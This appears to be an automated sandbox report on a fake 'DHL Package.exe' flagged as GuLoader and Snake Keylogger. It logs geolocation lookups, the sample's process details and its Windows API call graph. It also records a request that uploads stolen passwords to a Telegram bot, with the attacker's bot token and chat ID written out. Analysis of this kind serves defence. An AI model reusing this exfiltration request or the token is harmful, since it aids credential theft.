                                                                                              2024-08-07 07:28:22 UTC381INData Raw: 31 37 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                              Data Ascii: 176<Response><IP>102.129.252.169</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90002</ZipCode><TimeZone>America/Los
                                                                                              2024-08-07 07:28:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.11.2049746172.67.177.1344434252C:\Users\user\Desktop\DHL Package.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-08-07 07:28:23 UTC64OUTGET /xml/102.129.252.169 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                              2024-08-07 07:28:23 UTC708INHTTP/1.1 200 OK
                                                                                              Date: Wed, 07 Aug 2024 07:28:23 GMT
                                                                                              Content-Type: application/xml
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              access-control-allow-origin: *
                                                                                              vary: Accept-Encoding
                                                                                              Cache-Control: max-age=86400
                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 4
                                                                                              Last-Modified: Wed, 07 Aug 2024 07:28:19 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dNVta3gudZ8KfHE7fqE7GMXxZhcQRp%2BaEQOLabr%2FCrIiaTUgJKEYc4xvqLAwNOJjTemGladDGSJY%2BYhnaL1iV2irY9kR2dBeg%2Brja%2BnennKlP2eftOhB7OSf6%2FS0gvKKjUuRc3iS"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8af58cb4f882f9cc-SJC
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-08-07 07:28:23 UTC381INData Raw: 31 37 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                              Data Ascii: 176<Response><IP>102.129.252.169</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90002</ZipCode><TimeZone>America/Los
                                                                                              2024-08-07 07:28:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.11.2049747172.67.177.1344434252C:\Users\user\Desktop\DHL Package.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-08-07 07:28:24 UTC64OUTGET /xml/102.129.252.169 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                              2024-08-07 07:28:24 UTC704INHTTP/1.1 200 OK
                                                                                              Date: Wed, 07 Aug 2024 07:28:24 GMT
                                                                                              Content-Type: application/xml
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              access-control-allow-origin: *
                                                                                              vary: Accept-Encoding
                                                                                              Cache-Control: max-age=86400
                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 5
                                                                                              Last-Modified: Wed, 07 Aug 2024 07:28:19 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jESVpQbGx5w3AZM%2BErLPR3KuDLE0kI6NY9W5DoYCoA1eXSXeQWSB2CcOqJjz8M5q2gAFxdVTw%2Beq%2B4tVdg3tZOq2BDtT01d3pU0pwafkokhYOwvRjnhC0zUwMhXiB2N%2FehaD9gaY"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8af58cbb992df97b-SJC
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-08-07 07:28:24 UTC381INData Raw: 31 37 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                              Data Ascii: 176<Response><IP>102.129.252.169</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90002</ZipCode><TimeZone>America/Los
                                                                                              2024-08-07 07:28:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.11.2049748172.67.177.1344434252C:\Users\user\Desktop\DHL Package.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-08-07 07:28:25 UTC64OUTGET /xml/102.129.252.169 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                              2024-08-07 07:28:26 UTC698INHTTP/1.1 200 OK
                                                                                              Date: Wed, 07 Aug 2024 07:28:25 GMT
                                                                                              Content-Type: application/xml
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              access-control-allow-origin: *
                                                                                              vary: Accept-Encoding
                                                                                              Cache-Control: max-age=86400
                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 6
                                                                                              Last-Modified: Wed, 07 Aug 2024 07:28:19 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RuAq67b4lB7j9xdesfYhBQ6bf99vcHq6e2pPsr64LVgLwLA4n970eyuCfWpcFfqd79pBrhMu9xiXnCaf6%2BAT3DCnVF1rDMW1tz6E17bAjb9ko7wi3NzuH9sHv9dBNs07lITyaiWt"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8af58cc25f84aaac-SJC
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-08-07 07:28:26 UTC381INData Raw: 31 37 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                              Data Ascii: 176<Response><IP>102.129.252.169</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90002</ZipCode><TimeZone>America/Los
                                                                                              2024-08-07 07:28:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.11.2049749172.67.177.1344434252C:\Users\user\Desktop\DHL Package.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-08-07 07:28:26 UTC64OUTGET /xml/102.129.252.169 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                              2024-08-07 07:28:27 UTC710INHTTP/1.1 200 OK
                                                                                              Date: Wed, 07 Aug 2024 07:28:27 GMT
                                                                                              Content-Type: application/xml
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              access-control-allow-origin: *
                                                                                              vary: Accept-Encoding
                                                                                              Cache-Control: max-age=86400
                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 8
                                                                                              Last-Modified: Wed, 07 Aug 2024 07:28:19 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1bW9wqjhPF2%2FQ7beKr%2BYsWWvWj%2FC2C%2BYEi%2BupIOmX%2FXM0bKsU4XTgQNTM91WyrxpyMG2feQoa3DFBKTzD55E%2FWzlnu5rZjGZA31A4UjPKGVbze9VvN3QWjqsOgnLQRT5LKp3OR13"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8af58cc8fb9dfa82-SJC
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-08-07 07:28:27 UTC381INData Raw: 31 37 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                              Data Ascii: 176<Response><IP>102.129.252.169</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90002</ZipCode><TimeZone>America/Los
                                                                                              2024-08-07 07:28:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              8192.168.11.2049750149.154.167.2204434252C:\Users\user\Desktop\DHL Package.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-08-07 07:28:33 UTC352OUTPOST /bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendDocument?chat_id=6873631044&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=------------------------8dcb6910375831a
                                                                                              Host: api.telegram.org
                                                                                              Content-Length: 582
                                                                                              Connection: Keep-Alive
                                                                                              2024-08-07 07:28:33 UTC582OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 36 39 31 30 33 37 35 38 33 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 41 72 74 68 75 72 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 37 31 33 34 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 37 2f 30 38 2f 32 30 32 34 20 2f 20 30 33 3a 32 38 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                              Data Ascii: --------------------------8dcb6910375831aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:971342Date and Time: 07/08/2024 / 03:28:16Client IP:
                                                                                              2024-08-07 07:28:34 UTC388INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0
                                                                                              Date: Wed, 07 Aug 2024 07:28:34 GMT
                                                                                              Content-Type: application/json
                                                                                              Content-Length: 500
                                                                                              Connection: close
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                              2024-08-07 07:28:34 UTC500INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 39 37 39 35 30 31 35 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 7a 65 72 69 62 65 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4e 7a 65 72 69 62 65 31 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 37 33 36 33 31 30 34 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 6e 61 6b 69 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 6b 61 6e 61 6b 69 5f 32 30 32 34 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 33 30 31 35 37 31 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d
                                                                                              Data Ascii: {"ok":true,"result":{"message_id":27,"from":{"id":7197950156,"is_bot":true,"first_name":"Nzeribe1","username":"Nzeribe1bot"},"chat":{"id":6873631044,"first_name":"Manaki","username":"Makanaki_2024","type":"private"},"date":1723015714,"document":{"file_nam


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:03:26:23
                                                                                              Start date:07/08/2024
                                                                                              Path:C:\Users\user\Desktop\DHL Package.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\DHL Package.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:352'704 bytes
                                                                                              MD5 hash:CEB0FC229F47B61909CE0E6A68DD191F
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2283851326.000000000616D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:12
                                                                                              Start time:03:28:02
                                                                                              Start date:07/08/2024
                                                                                              Path:C:\Users\user\Desktop\DHL Package.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\DHL Package.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:352'704 bytes
                                                                                              MD5 hash:CEB0FC229F47B61909CE0E6A68DD191F
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.6270895609.0000000037035000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.6270895609.000000003710E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.6270895609.0000000036EA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:19.9%
                                                                                                Dynamic/Decrypted Code Coverage:13.4%
                                                                                                Signature Coverage:16.1%
                                                                                                Total number of Nodes:1599
                                                                                                Total number of Limit Nodes:40
                                                                                                execution_graph 4186 401941 4187 401943 4186->4187 4192 402d3e 4187->4192 4193 402d4a 4192->4193 4237 406418 4193->4237 4196 401948 4198 405aed 4196->4198 4279 405db8 4198->4279 4201 405b15 DeleteFileW 4203 401951 4201->4203 4202 405b2c 4204 405c57 4202->4204 4293 4063db lstrcpynW 4202->4293 4204->4203 4322 406739 FindFirstFileW 4204->4322 4206 405b52 4207 405b65 4206->4207 4208 405b58 lstrcatW 4206->4208 4294 405cfc lstrlenW 4207->4294 4210 405b6b 4208->4210 4213 405b7b lstrcatW 4210->4213 4214 405b86 lstrlenW FindFirstFileW 4210->4214 4213->4214 4216 405c4c 4214->4216 4218 405ba8 4214->4218 4215 405c75 4325 405cb0 lstrlenW CharPrevW 4215->4325 4216->4204 4220 405c2f FindNextFileW 4218->4220 4230 405aed 60 API calls 4218->4230 4232 405443 24 API calls 4218->4232 4298 4063db lstrcpynW 4218->4298 4299 405aa5 4218->4299 4307 405443 4218->4307 4318 4061a1 MoveFileExW 4218->4318 4220->4218 4224 405c45 FindClose 4220->4224 4221 405aa5 5 API calls 4223 405c87 4221->4223 4225 405ca1 4223->4225 4226 405c8b 4223->4226 4224->4216 4228 405443 24 API calls 4225->4228 4226->4203 4229 405443 24 API calls 4226->4229 4228->4203 4231 405c98 4229->4231 4230->4218 4233 4061a1 36 API calls 4231->4233 4232->4220 4235 405c9f 4233->4235 4235->4203 4253 406425 4237->4253 4238 406670 4239 402d6b 4238->4239 4270 4063db lstrcpynW 4238->4270 4239->4196 4254 40668a 4239->4254 4241 40663e lstrlenW 4241->4253 4243 406418 10 API calls 4243->4241 4246 406553 GetSystemDirectoryW 4246->4253 4247 406566 GetWindowsDirectoryW 4247->4253 4248 40668a 5 API calls 4248->4253 4249 406418 10 API calls 4249->4253 4250 4065e1 lstrcatW 4250->4253 4251 40659a SHGetSpecialFolderLocation 4252 4065b2 SHGetPathFromIDListW CoTaskMemFree 4251->4252 4251->4253 4252->4253 4253->4238 4253->4241 4253->4243 4253->4246 4253->4247 4253->4248 4253->4249 4253->4250 4253->4251 4263 4062a9 4253->4263 4268 406322 wsprintfW 4253->4268 4269 4063db lstrcpynW 4253->4269 4261 406697 4254->4261 4255 40670d 4256 406712 CharPrevW 4255->4256 4258 406733 4255->4258 4256->4255 4257 406700 CharNextW 4257->4255 4257->4261 4258->4196 4260 4066ec CharNextW 4260->4261 4261->4255 4261->4257 4261->4260 4262 4066fb CharNextW 4261->4262 4275 405cdd 4261->4275 4262->4257 4271 406248 4263->4271 4266 40630d 4266->4253 4267 4062dd RegQueryValueExW RegCloseKey 4267->4266 4268->4253 4269->4253 4270->4239 4272 406257 4271->4272 4273 406260 RegOpenKeyExW 4272->4273 4274 40625b 4272->4274 4273->4274 4274->4266 4274->4267 4276 405ce3 4275->4276 4277 405cf9 4276->4277 4278 405cea CharNextW 4276->4278 4277->4261 4278->4276 4328 4063db lstrcpynW 4279->4328 4281 405dc9 4329 405d5b CharNextW CharNextW 4281->4329 4284 405b0d 4284->4201 4284->4202 4285 40668a 5 API calls 4291 405ddf 4285->4291 4286 405e10 lstrlenW 4287 405e1b 4286->4287 4286->4291 4289 405cb0 3 API calls 4287->4289 4288 406739 2 API calls 4288->4291 4290 405e20 GetFileAttributesW 4289->4290 4290->4284 4291->4284 4291->4286 4291->4288 4292 405cfc 2 API calls 4291->4292 4292->4286 4293->4206 4295 405d0a 4294->4295 4296 405d10 CharPrevW 4295->4296 4297 405d1c 4295->4297 4296->4295 4296->4297 4297->4210 4298->4218 4335 405eac GetFileAttributesW 4299->4335 4302 405ad2 4302->4218 4303 405ac0 RemoveDirectoryW 4305 405ace 4303->4305 4304 405ac8 DeleteFileW 4304->4305 4305->4302 4306 405ade SetFileAttributesW 4305->4306 4306->4302 4308 40545e 4307->4308 4316 405500 4307->4316 4309 40547a lstrlenW 4308->4309 4310 406418 17 API calls 4308->4310 4311 4054a3 4309->4311 4312 405488 lstrlenW 4309->4312 4310->4309 4314 4054b6 4311->4314 4315 4054a9 SetWindowTextW 4311->4315 4313 40549a lstrcatW 4312->4313 4312->4316 4313->4311 4314->4316 4317 4054bc SendMessageW SendMessageW SendMessageW 4314->4317 4315->4314 4316->4218 4317->4316 4319 4061b5 4318->4319 4321 4061c2 4318->4321 4338 406027 4319->4338 4321->4218 4323 405c71 4322->4323 4324 40674f FindClose 4322->4324 4323->4203 4323->4215 4324->4323 4326 405c7b 4325->4326 4327 405ccc lstrcatW 4325->4327 4326->4221 4327->4326 4328->4281 4330 405d78 4329->4330 4331 405d8a 4329->4331 4330->4331 4332 405d85 CharNextW 4330->4332 4333 405cdd CharNextW 4331->4333 4334 405dae 4331->4334 4332->4334 4333->4331 4334->4284 4334->4285 4336 405ab1 4335->4336 4337 405ebe SetFileAttributesW 4335->4337 4336->4302 4336->4303 4336->4304 4337->4336 4339 406057 4338->4339 4340 40607d GetShortPathNameW 4338->4340 4365 405ed1 GetFileAttributesW CreateFileW 4339->4365 4342 406092 4340->4342 4343 40619c 4340->4343 4342->4343 4345 40609a wsprintfA 4342->4345 4343->4321 4344 406061 CloseHandle GetShortPathNameW 4344->4343 4346 406075 4344->4346 4347 406418 17 API calls 4345->4347 4346->4340 4346->4343 4348 4060c2 4347->4348 4366 405ed1 GetFileAttributesW CreateFileW 4348->4366 4350 4060cf 4350->4343 4351 4060de GetFileSize GlobalAlloc 4350->4351 4352 406100 4351->4352 4353 406195 CloseHandle 4351->4353 4367 405f54 ReadFile 4352->4367 4353->4343 4358 406133 4360 405e36 4 API calls 4358->4360 4359 40611f lstrcpyA 4361 406141 4359->4361 4360->4361 4362 406178 SetFilePointer 4361->4362 4374 405f83 WriteFile 4362->4374 4365->4344 4366->4350 4368 405f72 4367->4368 4368->4353 4369 405e36 lstrlenA 4368->4369 4370 405e77 lstrlenA 4369->4370 4371 405e50 lstrcmpiA 4370->4371 4372 405e7f 4370->4372 4371->4372 4373 405e6e CharNextA 4371->4373 4372->4358 4372->4359 4373->4370 4375 405fa1 GlobalFree 4374->4375 4375->4353 4376 4015c1 4377 402d3e 17 API calls 4376->4377 4378 4015c8 4377->4378 4379 405d5b 4 API calls 4378->4379 4389 4015d1 4379->4389 4380 401631 4382 401663 4380->4382 4383 401636 4380->4383 4381 405cdd CharNextW 4381->4389 4385 401423 24 API calls 4382->4385 4403 401423 4383->4403 4393 40165b 4385->4393 4389->4380 4389->4381 4392 401617 GetFileAttributesW 4389->4392 4395 4059ac 4389->4395 4398 405912 CreateDirectoryW 4389->4398 4407 40598f CreateDirectoryW 4389->4407 4391 40164a SetCurrentDirectoryW 4391->4393 4392->4389 4410 4067d0 GetModuleHandleA 4395->4410 4399 405963 GetLastError 4398->4399 4400 40595f 4398->4400 4399->4400 4401 405972 SetFileSecurityW 4399->4401 4400->4389 4401->4400 4402 405988 GetLastError 4401->4402 4402->4400 4404 405443 24 API calls 4403->4404 4405 401431 4404->4405 4406 4063db lstrcpynW 4405->4406 4406->4391 4408 4059a3 GetLastError 4407->4408 4409 40599f 4407->4409 4408->4409 4409->4389 4411 4067f6 GetProcAddress 4410->4411 4412 4067ec 4410->4412 4414 4059b3 4411->4414 4416 406760 GetSystemDirectoryW 4412->4416 4414->4389 4415 4067f2 4415->4411 4415->4414 4417 406782 wsprintfW LoadLibraryExW 4416->4417 4417->4415 5302 402a42 5303 402d1c 17 API calls 5302->5303 5304 402a48 5303->5304 5305 402a88 5304->5305 5306 402a6f 5304->5306 5314 402925 5304->5314 5307 402aa2 5305->5307 5308 402a92 5305->5308 5309 402a74 5306->5309 5310 402a85 5306->5310 5312 406418 17 API calls 5307->5312 5311 402d1c 17 API calls 5308->5311 5316 4063db lstrcpynW 5309->5316 5317 406322 wsprintfW 5310->5317 5311->5314 5312->5314 5316->5314 5317->5314 5318 401c43 5319 402d1c 17 API calls 5318->5319 5320 401c4a 5319->5320 5321 402d1c 17 API calls 5320->5321 5322 401c57 5321->5322 5323 401c6c 5322->5323 5324 402d3e 17 API calls 5322->5324 5325 401c7c 5323->5325 5328 402d3e 17 API calls 5323->5328 5324->5323 5326 401cd3 5325->5326 5327 401c87 5325->5327 5330 402d3e 17 API calls 5326->5330 5329 402d1c 17 API calls 5327->5329 5328->5325 5331 401c8c 5329->5331 5332 401cd8 5330->5332 5333 402d1c 17 API calls 5331->5333 5334 402d3e 17 API calls 5332->5334 5335 401c98 5333->5335 5336 401ce1 FindWindowExW 5334->5336 5337 401cc3 SendMessageW 5335->5337 5338 401ca5 SendMessageTimeoutW 5335->5338 5339 401d03 5336->5339 5337->5339 5338->5339 5340 402b43 5341 4067d0 5 API calls 5340->5341 5342 402b4a 5341->5342 5343 402d3e 17 API calls 